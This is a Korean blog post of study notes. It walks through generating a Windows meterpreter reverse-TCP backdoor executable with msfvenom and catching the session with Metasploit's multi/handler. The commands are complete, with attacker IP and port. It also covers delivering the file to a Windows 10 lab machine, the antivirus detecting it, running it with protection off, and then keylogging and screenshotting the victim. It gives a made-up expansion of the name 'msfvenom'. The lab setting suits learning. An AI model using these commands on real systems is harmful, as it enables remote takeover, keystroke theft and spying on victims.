MSF(MetaSploit Framework, 해킹도구)를 이용한 Backdoor(백도어, 악성코드를 생성하는 도구) 해킹

estar987·2023년 9월 13일
0

Security

목록 보기
21/43
- 개요
    ● msfvenom
     (MetaSploit Framework Virtualization Environment Neglected Operations Manipulation)
       → MSF의 가상환경을 무시하는 운영 속임수
    ● MetaSploit Payload 생성기를 이용해서 생성
       → MSF의 가상환경을 무시하는 운영 속임에 필요한 데이터를 생성하는 것
       → 해커가 실제 공격 대상이 PC에 전송하려는 데이터(악성코드) 또는 침투
           성공 후 본격적으로 수행할 일들의 총칭

- 악성코드 생성(msfvenom)
    ● 명령
       → (kali) # msfvenom –l
       

    ● 사용법
       → /usr/bin/msfvenom 
         : 명령어
       → -p
         : 페이로드 옵션 
       → windows/meterpreter/reverse_tcp 
         : 페이로드
       → LHOST=<IP>
         : 공격자 IP 
       → LPORT=8013
         : 공격자 포트 번호(임의의 포트 지정 가능)(생략 가능)
       → -f exe 
         : 악성코드 파일 유형(실행파일, Execute)
       → -o payload.exe
         : 백도어 파일 저장경로 및 파일 명 (임의 지정 가능)

       → 8013포트를 올린다

       # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=8013 -f exe > /home/samadal/madal.exe
       


    ● msf 콘솔 진입 하기
       → (kali) # msfconsole
       

    ● 실습 1
       → 작업 환경
         : win10(알약 0 , 방화벽 0)

       → 작업 과정
         1. 위의 msfvenom 명령어 실행(포트 번호와 ip 주소 포함해서 입력)
         2. # msfconsole 명령어로 콘솔 진입 
         3. msf6 > use exploit/multi/handler 
         4. msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
         : window 뒤에 탭키를 하고 기다리다가 다 출력되면 이어서 meterpreter/reverse_tcp를 쓰면 된다
         5. msf6 exploit(multi/handler) > set lhost 192.168.10.128
         6. msf6 exploit(multi/handler) > set lport 8013
         7. msf6 exploit(multi/handler) > set ExitOnSession false
         8. msf6 exploit(multi/handler) > exploit –j -z
         9. msf6 exploit(multi/handler) > sessions -l
        10. 앞에서 생성한 madal.exe를 win10에 가져오면 알약이 자동으로 
           실행된다
         : 알약은 실시간 검사를 켜둔 상태여야한다
         : 옮길 때 알 ftp 사용 하거나 압축하고 win10에 옮겨야한다
         

작업 화면

: 해킹 당하는 시스템이 내용이 없어서 나타나는 문제

kali에서 생성한 madal.exe 파일

win10에서 madal.exe 실행시 알약 작동 화면

    ● 실습 2
       → 작업 환경
         : win10(알약 X , 방화벽 X)

       → 작업 과정
         : 바로 직전의 실습 1과 동일

       → 결과 화면
         8. msf6 exploit(multi/handler) > exploit –j –z
         : 여기서 이전 작업과 차이가 나온다
         : 실행 전 윈도우에서 exe파일 실행후 exploit 명령어 실행한다
         (실행 할 때 마다 숫자가 하나씩 올라간다)
         


오류


정상적이니 화면
반드시 윈도우에서 만든 exe파일을 먼저 실행시키고 exploit –j –z 명령어를 입력한다

정상적인 작업(window 접근) 이후 window에 keyscan 후 screenshot


profile
System / Cloud / DevOps Engineer

0개의 댓글

관련 채용 정보